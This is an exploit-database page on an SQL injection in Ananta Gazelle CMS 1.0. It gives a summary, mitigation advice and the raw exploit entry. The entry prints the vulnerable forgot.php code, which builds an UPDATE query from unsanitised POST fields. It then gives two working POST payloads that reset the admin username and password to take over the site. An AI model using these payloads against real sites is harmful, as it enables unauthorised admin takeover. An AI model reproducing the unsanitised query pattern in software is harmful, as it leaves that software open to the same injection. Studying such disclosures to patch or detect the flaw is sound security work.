header-logo
Suggest Exploit
vendor:
Gazelle CMS
by:
hackme
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Gazelle CMS
Affected Version From: 1.0 stable
Affected Version To: 1.0 stable
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: backbox 2.1
2012

Ananta Gazelle CMS – Update Statement Sql injection

This SQL injection vulnerability allows an attacker to update the username and password of the admin user in Ananta Gazelle CMS. The vulnerability is present in the 'forgot.php' page, where the user can submit a form to set a new activation key for their account. The vulnerable code does not properly sanitize the user input, allowing the attacker to modify the SQL query and set arbitrary values for the admin username and password. The vulnerability can be exploited by sending a specially crafted POST request to the 'forgot.php' page with the desired values for the username and password. The exploit changes the username to '1' and the password to '1' by copying the value of a default column in the 'users' table. This allows the attacker to gain administrative access to the CMS.

Mitigation:

To mitigate this vulnerability, the developer should implement proper input validation and parameterized queries to prevent SQL injection attacks. Additionally, the developer should ensure that user input is properly sanitized before being used in SQL queries.
Source

Exploit-DB raw data:

# Exploit Title: Ananta Gazelle CMS - Update Statement Sql injection
# Google Dork: -
# Date: 07-02-2012
# Author: hackme
# Software Link: http://sourceforge.net/projects/ananta/files/stable/Gazelle 1.0 stable/Ananta_Gazelle1.0.zip/
# Version: 1.0 stable
# Tested on: backbox 2.1
# CVE : -

[SORRY FOR MY BAD ENGLISH]

[+] This sql injection doesn't allow us to read the contents of the tables, but to do the update statement of the username and password of admin.
Since you can't enter a special chars as the apex, and then we don't change the username and password in what we want, we will copy the value of a column with default value in column username and password.
In fact we have:
	
	admin - username = 1
              - password = 1

[+] Vulnerable Code(forgot.php): 
[CODE]
if (!empty($_POST) && !isset($_POST["loginform"])) {
	// form submitted, set a new activation key for this user (however don't set the user to inactive, so no-one can block someone else's account
	$sql = "UPDATE ".$tableprefix.$_POST["table"]." SET ";
	
	if ($_POST["activate"] <> "") {
		$sql = $sql."activate='".$_POST["activate"]."'";
	}
	
	$sql = $sql." WHERE email"."='".$_POST["email"]."'";
	//no control 
	if (mysql_query($sql)) {
[/code]
[+] default table users columns: number,name,pass,email,activate,active,admin,joindate,showemail
[+] Risk: High
[+] Vuln Page: www.site.it/ananta/forgot.php

[+] Change admin username in "1" [POST-DATA]
email=&save=Save&table=users SET name=active where number=1--&activate=lol&location=/ananta/forgot.php

[+] Change admin password in "1" [POST-DATA]
email=v&save=Save&table=users SET pass=md5(active) where number=1--&activate=lol&location=/ananta/forgot.php

[+]...If You Really Want Something, You Can Have It...

[+] Greetz To: MZ